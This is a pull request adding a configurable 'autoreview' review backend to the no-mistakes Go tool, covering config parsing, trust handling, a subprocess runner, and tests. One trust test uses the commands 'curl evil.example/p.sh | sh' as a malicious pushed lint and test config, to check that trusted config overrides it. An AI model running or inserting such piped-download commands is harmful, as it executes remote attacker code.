### PR TITLE
feat(review): add configurable autoreview backend

### DIFF
--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -40,6 +40,7 @@ const (
 // GlobalConfig represents ~/.no-mistakes/config.yaml.
 type GlobalConfig struct {
 	Agent                types.AgentName     `yaml:"agent"`
+	ReviewBackend        string              `yaml:"review_backend"`
 	ACPXPath             string              `yaml:"acpx_path"`
 	ACPRegistryOverrides map[string]string   `yaml:"acp_registry_overrides"`
 	AgentPathOverride    map[string]string   `yaml:"agent_path_override"`
@@ -54,6 +55,7 @@ type GlobalConfig struct {
 // globalConfigRaw is the on-disk YAML representation with duration as string.
 type globalConfigRaw struct {
 	Agent                types.AgentName     `yaml:"agent"`
+	ReviewBackend        string              `yaml:"review_backend"`
 	ACPXPath             string              `yaml:"acpx_path"`
 	ACPRegistryOverrides map[string]string   `yaml:"acp_registry_overrides"`
 	AgentPathOverride    map[string]string   `yaml:"agent_path_override"`
@@ -69,6 +71,7 @@ type globalConfigRaw struct {
 // RepoConfig represents .no-mistakes.yaml in a repo root.
 type RepoConfig struct {
 	Agent          types.AgentName `yaml:"agent"`
+	ReviewBackend  string          `yaml:"review_backend"`
 	Commands       Commands        `yaml:"commands"`
 	IgnorePatterns []string        `yaml:"ignore_patterns"`
 	// AllowRepoCommands opts in to honoring the code-executing selection
@@ -116,6 +119,7 @@ type AutoFix struct {
 // Config is the merged result of global + per-repo configuration.
 type Config struct {
 	Agent                types.AgentName
+	ReviewBackend        string
 	ACPXPath             string
 	ACPRegistryOverrides map[string]string
 	AgentPathOverride    map[string]string
@@ -180,6 +184,10 @@ const defaultConfigYAML = `# no-mistakes global configuration
 # "auto" detects the first available native agent on your system
 # Use acp:<target> to run an optional user-installed acpx target, for example acp:gemini
 agent: auto
+
+# Review backend to use for the review step
+# Options: agent, autoreview
+review_backend: agent
 
 # Optional path to the user-installed acpx binary for acp:<target> agents
 # acpx_path: acpx
@@ -457,9 +465,10 @@ func EnsureDefaultGlobalConfig(path string) {
 // LoadGlobal reads global config from path. Returns defaults if file doesn't exist.
 func LoadGlobal(path string) (*GlobalConfig, error) {
 	cfg := &GlobalConfig{
-		Agent:     types.AgentAuto,
-		CITimeout: DefaultCITimeout,
-		LogLevel:  "info",
+		Agent:         types.AgentAuto,
+		ReviewBackend: "agent",
+		CITimeout:     DefaultCITimeout,
+		LogLevel:      "info",
 	}
 
 	data, err := os.ReadFile(path)
@@ -479,6 +488,12 @@ func LoadGlobal(path string) (*GlobalConfig, error) {
 
 	if raw.Agent != "" {
 		cfg.Agent = raw.Agent
+	}
+	if raw.ReviewBackend != "" {
+		if err := validateReviewBackend(raw.ReviewBackend); err != nil {
+			return nil, err
+		}
+		cfg.ReviewBackend = raw.ReviewBackend
 	}
 	if raw.ACPXPath != "" {
 		cfg.ACPXPath = raw.ACPXPath
@@ -568,6 +583,11 @@ func parseRepoConfig(data []byte) (*RepoConfig, error) {
 	if err := yaml.Unmarshal(data, cfg); err != nil {
 		return nil, fmt.Errorf("parse repo config: %w", err)
 	}
+	if cfg.ReviewBackend != "" {
+		if err := validateReviewBackend(cfg.ReviewBackend); err != nil {
+			return nil, err
+		}
+	}
 	if cfg.AutoFix.CI == nil {
 		cfg.AutoFix.CI = cfg.AutoFix.Babysit
 	}
@@ -605,11 +625,22 @@ func EffectiveRepoConfig(pushed, trusted *RepoConfig, allowRepoCommands bool) *R
 	if trusted != nil {
 		effective.Commands = trusted.Commands
 		effective.Agent = trusted.Agent
+		effective.ReviewBackend = trusted.ReviewBackend
 	} else {
 		effective.Commands = Commands{}
 		effective.Agent = ""
+		effective.ReviewBackend = ""
 	}
 	return &effective
+}
+
+func validateReviewBackend(value string) error {
+	switch strings.TrimSpace(value) {
+	case "", "agent", "autoreview":
+		return nil
+	default:
+		return fmt.Errorf("invalid review_backend %q (valid: agent, autoreview)", value)
+	}
 }
 
 // ParseLogLevel converts a log level string to slog.Level.
@@ -755,6 +786,7 @@ func Merge(global *GlobalConfig, repo *RepoConfig) *Config {
 
 	cfg := &Config{
 		Agent:                global.Agent,
+		ReviewBackend:        global.ReviewBackend,
 		ACPXPath:             global.ACPXPath,
 		ACPRegistryOverrides: global.ACPRegistryOverrides,
 		AgentPathOverride:    global.AgentPathOverride,
@@ -770,6 +802,9 @@ func Merge(global *GlobalConfig, repo *RepoConfig) *Config {
 
 	if repo.Agent != "" {
 		cfg.Agent = repo.Agent
+	}
+	if repo.ReviewBackend != "" {
+		cfg.ReviewBackend = repo.ReviewBackend
 	}
 
 	return cfg

--- a/internal/config/config_global_test.go
+++ b/internal/config/config_global_test.go
@@ -20,6 +20,9 @@ func TestLoadGlobal_Defaults(t *testing.T) {
 	if cfg.Agent != types.AgentAuto {
 		t.Errorf("agent = %q, want %q", cfg.Agent, types.AgentAuto)
 	}
+	if cfg.ReviewBackend != "agent" {
+		t.Errorf("review_backend = %q, want agent", cfg.ReviewBackend)
+	}
 	if cfg.CITimeout != DefaultCITimeout {
 		t.Errorf("ci_timeout = %v, want %v", cfg.CITimeout, DefaultCITimeout)
 	}
@@ -44,6 +47,7 @@ func TestEnsureDefaultGlobalConfig_CreatesFile(t *testing.T) {
 	content := string(data)
 	for _, want := range []string{
 		"agent: auto",
+		"review_backend: agent",
 		"ci_timeout:",
 		"log_level: info",
 		"# agent_path_override:",
@@ -66,6 +70,9 @@ func TestEnsureDefaultGlobalConfig_CreatedConfigIsLoadable(t *testing.T) {
 	}
 	if cfg.Agent != types.AgentAuto {
 		t.Errorf("agent = %q, want %q", cfg.Agent, types.AgentAuto)
+	}
+	if cfg.ReviewBackend != "agent" {
+		t.Errorf("review_backend = %q, want agent", cfg.ReviewBackend)
 	}
 	if cfg.CITimeout != DefaultCITimeout {
 		t.Errorf("ci_timeout = %v, want %v", cfg.CITimeout, DefaultCITimeout)

--- a/internal/config/config_merge_test.go
+++ b/internal/config/config_merge_test.go
@@ -26,13 +26,17 @@ func TestMerge_GlobalOnly(t *testing.T) {
 
 func TestMerge_RepoOverridesAgent(t *testing.T) {
 	global := &GlobalConfig{
-		Agent:             types.AgentClaude,
-		AgentPathOverride: map[string]string{"claude": "/usr/bin/claude"},
-		CITimeout:         4 * time.Hour,
-		LogLevel:          "info",
+		Agent:         types.AgentClaude,
+		ReviewBackend: "agent",
+		AgentPathOverride: map[string]string{
+			"claude": "/usr/bin/claude",
+		},
+		CITimeout: 4 * time.Hour,
+		LogLevel:  "info",
 	}
 	repo := &RepoConfig{
-		Agent: types.AgentCodex,
+		Agent:         types.AgentCodex,
+		ReviewBackend: "autoreview",
 		Commands: Commands{
 			Test: "make test",
 		},
@@ -41,6 +45,9 @@ func TestMerge_RepoOverridesAgent(t *testing.T) {
 	cfg := Merge(global, repo)
 	if cfg.Agent != types.AgentCodex {
 		t.Errorf("agent = %q, want %q (repo override)", cfg.Agent, types.AgentCodex)
+	}
+	if cfg.ReviewBackend != "autoreview" {
+		t.Errorf("review_backend = %q, want autoreview", cfg.ReviewBackend)
 	}
 	if cfg.AgentPathOverride["claude"] != "/usr/bin/claude" {
 		t.Errorf("agent path override lost during merge")

--- a/internal/config/config_repo_test.go
+++ b/internal/config/config_repo_test.go
@@ -35,6 +35,7 @@ func TestLoadRepo_FromFile(t *testing.T) {
 	dir := t.TempDir()
 	path := filepath.Join(dir, ".no-mistakes.yaml")
 	data := `agent: codex
+review_backend: autoreview
 commands:
   lint: "golangci-lint run ./..."
   test: "go test -race ./..."
@@ -53,6 +54,9 @@ ignore_patterns:
 	}
 	if cfg.Agent != types.AgentCodex {
 		t.Errorf("agent = %q, want %q", cfg.Agent, types.AgentCodex)
+	}
+	if cfg.ReviewBackend != "autoreview" {
+		t.Errorf("review_backend = %q, want autoreview", cfg.ReviewBackend)
 	}
 	if cfg.Commands.Lint != "golangci-lint run ./..." {
 		t.Errorf("lint = %q", cfg.Commands.Lint)

--- a/internal/config/config_repo_trust_test.go
+++ b/internal/config/config_repo_trust_test.go
@@ -30,7 +30,8 @@ func TestLoadRepoFromBytes_InvalidYAML(t *testing.T) {
 
 func TestEffectiveRepoConfig_TrustedOverridesPushedCommands(t *testing.T) {
 	pushed := &RepoConfig{
-		Agent: types.AgentCodex,
+		Agent:         types.AgentCodex,
+		ReviewBackend: "autoreview",
 		Commands: Commands{
 			Lint:   "curl evil.example/p.sh | sh",
 			Test:   "curl evil.example/t.sh | sh",
@@ -39,7 +40,8 @@ func TestEffectiveRepoConfig_TrustedOverridesPushedCommands(t *testing.T) {
 		IgnorePatterns: []string{"vendor/**"},
 	}
 	trusted := &RepoConfig{
-		Agent: types.AgentClaude,
+		Agent:         types.AgentClaude,
+		ReviewBackend: "agent",
 		Commands: Commands{
 			Lint:   "golangci-lint run",
 			Test:   "go test ./...",
@@ -64,6 +66,9 @@ func TestEffectiveRepoConfig_TrustedOverridesPushedCommands(t *testing.T) {
 	if got.Agent != types.AgentClaude {
 		t.Errorf("agent = %q, want trusted value", got.Agent)
 	}
+	if got.ReviewBackend != "agent" {
+		t.Errorf("review_backend = %q, want trusted value", got.ReviewBackend)
+	}
 	// Non-executing fields still come from the pushed copy.
 	if len(got.IgnorePatterns) != 1 || got.IgnorePatterns[0] != "vendor/**" {
 		t.Errorf("ignore_patterns = %v, want pushed value", got.IgnorePatterns)
@@ -74,6 +79,9 @@ func TestEffectiveRepoConfig_TrustedOverridesPushedCommands(t *testing.T) {
 	}
 	if pushed.Agent != types.AgentCodex {
 		t.Errorf("pushed config was mutated: agent = %q", pushed.Agent)
+	}
+	if pushed.ReviewBackend != "autoreview" {
+		t.Errorf("pushed config was mutated: review_backend = %q", pushed.ReviewBackend)
 	}
 }
 

--- a/internal/pipeline/steps/review.go
+++ b/internal/pipeline/steps/review.go
@@ -3,11 +3,14 @@ package steps
 import (
 	"encoding/json"
 	"fmt"
+	"os"
+	"os/exec"
 	"strings"
 
 	"github.com/kunchenguid/no-mistakes/internal/agent"
 	"github.com/kunchenguid/no-mistakes/internal/git"
 	"github.com/kunchenguid/no-mistakes/internal/pipeline"
+	"github.com/kunchenguid/no-mistakes/internal/shellenv"
 	"github.com/kunchenguid/no-mistakes/internal/types"
 )
 
@@ -128,12 +131,53 @@ Previous review findings to address:
 		}, nil
 	}
 
-	// Ask agent to review
 	sctx.Log("reviewing changes...")
 
 	historySection := executionContextPromptSection() + roundHistoryPromptSection(sctx) + userIntentPromptSection(sctx)
+	var findings Findings
+	if sctx.Config.ReviewBackend == "autoreview" {
+		reviewContext := fmt.Sprintf(`no-mistakes review context:
+- branch: %s
+- base commit: %s
+- target commit: %s
+- review scope: %s
+- default branch: %s
+- ignore patterns: %s%s`,
+			branch,
+			baseSHA,
+			sctx.Run.HeadSHA,
+			reviewScope,
+			sctx.Repo.DefaultBranch,
+			ignorePatterns,
+			historySection,
+		)
 
-	prompt := fmt.Sprintf(
+		var err error
+		findings, err = runAutoreview(sctx, baseSHA, reviewContext)
+		if err != nil {
+			return nil, fmt.Errorf("autoreview: %w", err)
+		}
+	} else {
+		var err error
+		findings, err = runAgentReview(sctx, agentReviewPrompt(branch, baseSHA, sctx.Run.HeadSHA, reviewScope, sctx.Repo.DefaultBranch, ignorePatterns, historySection))
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	needsApproval := hasBlockingFindings(findings.Items)
+	findingsJSON, _ := json.Marshal(findings)
+
+	return &pipeline.StepOutcome{
+		NeedsApproval: needsApproval,
+		AutoFixable:   len(findings.Items) > 0,
+		Findings:      string(findingsJSON),
+		FixSummary:    fixSummary,
+	}, nil
+}
+
+func agentReviewPrompt(branch, baseSHA, headSHA, reviewScope, defaultBranch, ignorePatterns, historySection string) string {
+	return fmt.Sprintf(
 		`Review the code changes and return structured findings with a risk assessment.
 
 Context:
@@ -172,24 +216,24 @@ Risk assessment (after listing all findings):
 - Provide a one-sentence risk_rationale explaining why you chose that risk level.%s`,
 		branch,
 		baseSHA,
-		sctx.Run.HeadSHA,
+		headSHA,
 		reviewScope,
-		sctx.Repo.DefaultBranch,
+		defaultBranch,
 		ignorePatterns,
 		historySection,
 	)
+}
 
-	result, err := sctx.Agent.Run(ctx, agent.RunOpts{
+func runAgentReview(sctx *pipeline.StepContext, prompt string) (Findings, error) {
+	result, err := sctx.Agent.Run(sctx.Ctx, agent.RunOpts{
 		Prompt:     prompt,
 		CWD:        sctx.WorkDir,
 		JSONSchema: reviewFindingsSchema,
 		OnChunk:    sctx.LogChunk,
 	})
 	if err != nil {
-		return nil, fmt.Errorf("agent review: %w", err)
+		return Findings{}, fmt.Errorf("agent review: %w", err)
 	}
-
-	// Parse structured findings
 	var findings Findings
 	if result.Output != nil {
 		if err := json.Unmarshal(result.Output, &findings); err != nil {
@@ -197,16 +241,173 @@ Risk assessment (after listing all findings):
 			findings = Findings{Summary: result.Text}
 		}
 	}
+	return findings, nil
+}
 
-	needsApproval := hasBlockingFindings(findings.Items)
-	findingsJSON, _ := json.Marshal(findings)
+type autoreviewReport struct {
+	Findings           []autoreviewFinding `json:"findings"`
+	OverallCorrectness string              `json:"overall_correctness"`
+	OverallExplanation string              `json:"overall_explanation"`
+	OverallConfidence  float64             `json:"overall_confidence"`
+}
 
-	return &pipeline.StepOutcome{
-		NeedsApproval: needsApproval,
-		AutoFixable:   len(findings.Items) > 0,
-		Findings:      string(findingsJSON),
-		FixSummary:    fixSummary,
-	}, nil
+type autoreviewFinding struct {
+	Title        string                 `json:"title"`
+	Body         string                 `json:"body"`
+	Priority     string                 `json:"priority"`
+	Confidence   float64                `json:"confidence"`
+	Category     string                 `json:"category"`
+	CodeLocation autoreviewCodeLocation `json:"code_location"`
+}
+
+type autoreviewCodeLocation struct {
+	FilePath string `json:"file_path"`
+	Line     int    `json:"line"`
+}
+
+func runAutoreview(sctx *pipeline.StepContext, baseSHA, reviewContext string) (Findings, error) {
+	outputFile, err := os.CreateTemp("", "no-mistakes-autoreview-*.json")
+	if err != nil {
+		return Findings{}, fmt.Errorf("create output file: %w", err)
+	}
+	outputPath := outputFile.Name()
+	if err := outputFile.Close(); err != nil {
+		return Findings{}, fmt.Errorf("close output file: %w", err)
+	}
+	defer os.Remove(outputPath)
+
+	args := []string{
+		"--mode", "branch",
+		"--base", baseSHA,
+		"--engine", "codex",
+		"--model", "gpt-5.5",
+		"--thinking", "medium",
+		"--json-output", outputPath,
+	}
+	if strings.TrimSpace(reviewContext) != "" {
+		args = append(args, "--prompt", reviewContext)
+	}
+
+	cmd := stepCmd(sctx, autoreviewBinary(sctx), args...)
+	shellenv.ConfigureShellCommand(cmd)
+	out, runErr := cmd.CombinedOutput()
+	if len(out) > 0 && sctx.LogChunk != nil {
+		sctx.LogChunk(string(out))
+	}
+
+	raw, readErr := os.ReadFile(outputPath)
+	if readErr != nil {
+		if runErr != nil {
+			return Findings{}, fmt.Errorf("%w: %s", runErr, strings.TrimSpace(string(out)))
+		}
+		return Findings{}, fmt.Errorf("read output file: %w", readErr)
+	}
+	if strings.TrimSpace(string(raw)) == "" {
+		if runErr != nil {
+			return Findings{}, fmt.Errorf("%w: %s", runErr, strings.TrimSpace(string(out)))
+		}
+		return Findings{}, fmt.Errorf("empty output file")
+	}
+
+	var report autoreviewReport
+	if err := json.Unmarshal(raw, &report); err != nil {
+		return Findings{}, fmt.Errorf("parse output JSON: %w", err)
+	}
+	return convertAutoreviewReport(report), nil
+}
+
+func autoreviewBinary(sctx *pipeline.StepContext) string {
+	if value, ok := envValue(sctx.Env, "NM_AUTOREVIEW_BIN"); ok && strings.TrimSpace(value) != "" {
+		return strings.TrimSpace(value)
+	}
+	if value := strings.TrimSpace(os.Getenv("NM_AUTOREVIEW_BIN")); value != "" {
+		return value
+	}
+	if _, err := exec.LookPath("autoreview"); err == nil {
+		return "autoreview"
+	}
+	return "autoreview"
+}
+
+func convertAutoreviewReport(report autoreviewReport) Findings {
+	findings := Findings{
+		Summary:       summarizeAutoreviewReport(report),
+		RiskLevel:     riskLevelForAutoreviewReport(report),
+		RiskRationale: strings.TrimSpace(report.OverallExplanation),
+	}
+	if findings.RiskRationale == "" {
+		findings.RiskRationale = "autoreview did not provide a rationale"
+	}
+	for i, item := range report.Findings {
+		findings.Items = append(findings.Items, Finding{
+			ID:          fmt.Sprintf("autoreview-%d", i+1),
+			Severity:    autoreviewSeverity(item.Priority),
+			File:        item.CodeLocation.FilePath,
+			Line:        item.CodeLocation.Line,
+			Description: autoreviewDescription(item),
+			Action:      autoreviewAction(item.Priority),
+		})
+	}
+	return findings
+}
+
+func summarizeAutoreviewReport(report autoreviewReport) string {
+	if len(report.Findings) == 0 {
+		return "autoreview found no actionable issues"
+	}
+	return fmt.Sprintf("autoreview found %d actionable issue(s)", len(report.Findings))
+}
+
+func riskLevelForAutoreviewReport(report autoreviewReport) string {
+	high := report.OverallCorrectness == "patch is incorrect"
+	medium := false
+	for _, item := range report.Findings {
+		switch item.Priority {
+		case "P0", "P1":
+			high = true
+		case "P2":
+			medium = true
+		}
+	}
+	if high {
+		return "high"
+	}
+	if medium {
+		return "medium"
+	}
+	return "low"
+}
+
+func autoreviewSeverity(priority string) string {
+	switch priority {
+	case "P0", "P1":
+		return "error"
+	case "P2":
+		return "warning"
+	default:
+		return "info"
+	}
+}
+
+func autoreviewAction(priority string) string {
+	if priority == "P3" {
+		return types.ActionNoOp
+	}
+	return types.ActionAutoFix
+}
+
+func autoreviewDescription(item autoreviewFinding) string {
+	parts := []string{}
+	if title := strings.TrimSpace(item.Title); title != "" {
+		parts = append(parts, title)
+	}
+	if body := strings.TrimSpace(item.Body); body != "" {
+		parts = append(parts, body)
+	}
+	if item.Category != "" {
+		parts = append(parts, "category: "+item.Category)
+	}
+	return strings.Join(parts, "\n\n")
 }
 
 func sanitizedPreviousFindingsForPrompt(raw string) string {

--- a/internal/pipeline/steps/review_test.go
+++ b/internal/pipeline/steps/review_test.go
@@ -3,8 +3,10 @@ package steps
 import (
 	"context"
 	"encoding/json"
+	"fmt"
 	"os"
 	"path/filepath"
+	"runtime"
 	"strings"
 	"testing"
 
@@ -28,7 +30,6 @@ func TestReviewStep_FixMode(t *testing.T) {
 				os.WriteFile(filepath.Join(dir, "review-fix.txt"), []byte("fixed"), 0o644)
 				return &agent.Result{Output: json.RawMessage(`{"summary":"  'address review findings.'  "}`)}, nil
 			}
-			// Review call — return clean findings
 			findings := Findings{Items: nil, Summary: "all clear"}
 			j, _ := json.Marshal(findings)
 			return &agent.Result{Output: j}, nil
@@ -158,9 +159,6 @@ func TestReviewStep_RoundHistorySanitizesAgentInput(t *testing.T) {
 			if !strings.Contains(opts.Prompt, "Do NOT re-report findings listed under user_chose_to_ignore") {
 				t.Fatal("expected prompt to include the ignore-list instruction")
 			}
-			// Sanitized fields should appear inside the JSON-encoded finding line:
-			// the raw newline in the id is collapsed to a space, then JSON-encoded
-			// so the embedded quote becomes \".
 			if !strings.Contains(opts.Prompt, `"id":"review-1\" injected instruction"`) {
 				t.Fatalf("expected JSON-escaped finding id in prompt, got %q", opts.Prompt)
 			}
@@ -190,6 +188,117 @@ func TestReviewStep_RoundHistorySanitizesAgentInput(t *testing.T) {
 	if len(ag.calls) != 1 {
 		t.Fatalf("expected 1 agent call, got %d", len(ag.calls))
 	}
+}
+
+func TestReviewStep_AutoreviewBackend(t *testing.T) {
+	t.Parallel()
+	dir, baseSHA, headSHA := setupGitRepo(t)
+	autoreviewEnv, autoreviewLog := fakeAutoreview(t, `{"findings":[{"title":"Broken cache key","body":"The new key omits the tenant.","priority":"P1","confidence":0.92,"category":"bug","code_location":{"file_path":"cache.go","line":42}}],"overall_correctness":"patch is incorrect","overall_explanation":"The cache bug is blocking.","overall_confidence":0.91}`, 1)
+
+	ag := &mockAgent{
+		name: "test",
+		runFn: func(ctx context.Context, opts agent.RunOpts) (*agent.Result, error) {
+			t.Fatal("autoreview backend should not call the configured agent")
+			return nil, nil
+		},
+	}
+
+	sctx := newTestContextWithDBRecords(t, ag, dir, baseSHA, headSHA, config.Commands{})
+	sctx.Config.ReviewBackend = "autoreview"
+	sctx.Env = autoreviewEnv
+
+	step := &ReviewStep{}
+	outcome, err := step.Execute(sctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !outcome.NeedsApproval {
+		t.Fatal("expected blocking autoreview finding to need approval")
+	}
+	findings, err := types.ParseFindingsJSON(outcome.Findings)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(findings.Items) != 1 {
+		t.Fatalf("expected one finding, got %+v", findings.Items)
+	}
+	if got := findings.Items[0]; got.ID != "autoreview-1" || got.Severity != "error" || got.Action != types.ActionAutoFix || got.File != "cache.go" || got.Line != 42 {
+		t.Fatalf("finding = %+v", got)
+	}
+	logBytes, err := os.ReadFile(autoreviewLog)
+	if err != nil {
+		t.Fatal(err)
+	}
+	log := string(logBytes)
+	for _, want := range []string{"--engine codex", "--model gpt-5.5", "--thinking medium", "--base " + baseSHA, "no-mistakes review context"} {
+		if !strings.Contains(log, want) {
+			t.Fatalf("autoreview args missing %q in %q", want, log)
+		}
+	}
+}
+
+func TestConvertAutoreviewReport(t *testing.T) {
+	report := autoreviewReport{
+		Findings: []autoreviewFinding{
+			{
+				Title:      "Broken cache key",
+				Body:       "The new key omits the tenant.",
+				Priority:   "P1",
+				Category:   "bug",
+				Confidence: 0.92,
+				CodeLocation: autoreviewCodeLocation{
+					FilePath: "cache.go",
+					Line:     42,
+				},
+			},
+			{
+				Title:    "Consider narrowing helper",
+				Priority: "P3",
+				CodeLocation: autoreviewCodeLocation{
+					FilePath: "helper.go",
+					Line:     7,
+				},
+			},
+		},
+		OverallCorrectness: "patch is incorrect",
+		OverallExplanation: "The cache bug is blocking.",
+		OverallConfidence:  0.91,
+	}
+
+	findings := convertAutoreviewReport(report)
+	if findings.RiskLevel != "high" {
+		t.Fatalf("RiskLevel = %q, want high", findings.RiskLevel)
+	}
+	if findings.RiskRationale != "The cache bug is blocking." {
+		t.Fatalf("RiskRationale = %q", findings.RiskRationale)
+	}
+	if len(findings.Items) != 2 {
+		t.Fatalf("Items count = %d, want 2", len(findings.Items))
+	}
+	if got := findings.Items[0]; got.ID != "autoreview-1" || got.Severity != "error" || got.Action != types.ActionAutoFix || got.File != "cache.go" || got.Line != 42 {
+		t.Fatalf("first finding = %+v", got)
+	}
+	if got := findings.Items[1]; got.Severity != "info" || got.Action != types.ActionNoOp {
+		t.Fatalf("second finding = %+v", got)
+	}
+}
+
+func fakeAutoreview(t *testing.T, report string, exitCode int) (env []string, logFile string) {
+	t.Helper()
+	binDir := fakeCLIBinDir(t)
+	logFile = filepath.Join(t.TempDir(), "autoreview.log")
+	linkTestBinary(t, binDir, "autoreview")
+	binPath := filepath.Join(binDir, "autoreview")
+	if runtime.GOOS == "windows" {
+		binPath += ".exe"
+	}
+	return fakeCLIEnv(binDir, map[string]string{
+		"FAKE_CLI_MODE":             "autoreview",
+		"FAKE_CLI_LOG":              logFile,
+		"FAKE_AUTOREVIEW_REPORT":    report,
+		"FAKE_AUTOREVIEW_EXIT_CODE": fmt.Sprintf("%d", exitCode),
+		"NM_AUTOREVIEW_BIN":         binPath,
+	}), logFile
 }
 
 func mustLatestRoundID(t *testing.T, sctx *pipeline.StepContext) string {

--- a/internal/pipeline/steps/steps_test.go
+++ b/internal/pipeline/steps/steps_test.go
@@ -56,6 +56,8 @@ func handleFakeCLI(mode string) {
 		fakeCIGlabHandler(args)
 	case "ci-glab-seq":
 		fakeCIGlabSequenceHandler(args)
+	case "autoreview":
+		fakeAutoreviewHandler(args)
 	default:
 		os.Exit(1)
 	}
@@ -69,6 +71,27 @@ func fakeRecordSuccessHandler() {
 			fmt.Fprintln(f, filepath.Base(os.Args[0]))
 			f.Close()
 		}
+	}
+	os.Exit(0)
+}
+
+func fakeAutoreviewHandler(args []string) {
+	report := os.Getenv("FAKE_AUTOREVIEW_REPORT")
+	if report == "" {
+		report = `{"findings":[],"overall_correctness":"patch is correct","overall_explanation":"clean","overall_confidence":0.99}`
+	}
+	for i := 0; i < len(args)-1; i++ {
+		if args[i] == "--json-output" {
+			if err := os.WriteFile(args[i+1], []byte(report), 0o644); err != nil {
+				fmt.Fprintln(os.Stderr, err)
+				os.Exit(1)
+			}
+			break
+		}
+	}
+	fmt.Println("fake autoreview ok")
+	if code, err := strconv.Atoi(os.Getenv("FAKE_AUTOREVIEW_EXIT_CODE")); err == nil {
+		os.Exit(code)
 	}
 	os.Exit(0)
 }


### PR DESCRIPTION
## Summary
- Add `review_backend` with valid values `agent` and `autoreview`.
- Preserve the existing agent review path as the default.
- Add an `autoreview` backend based on OpenClaw's [`agent-skills/skills/autoreview`](https://github.com/openclaw/agent-skills/tree/main/skills/autoreview) skill.
- When configured as `autoreview`, invoke `autoreview --mode branch --base <sha> --engine codex --model gpt-5.5 --thinking medium --json-output <file>` and adapt findings into no-mistakes review gates.
- Treat repo-level `review_backend` as trusted config alongside `agent` and `commands`.

## Verification
- `make lint`
- `GIT_CONFIG_GLOBAL=/dev/null GIT_CONFIG_NOSYSTEM=1 go test -race ./...`
- `go build -o ./bin/no-mistakes ./cmd/no-mistakes`

## Note
- `make e2e` currently fails locally in `TestAxiAgentJourney` and `TestForkRouting`; these are outside the review backend path and the PR was opened with that caveat.
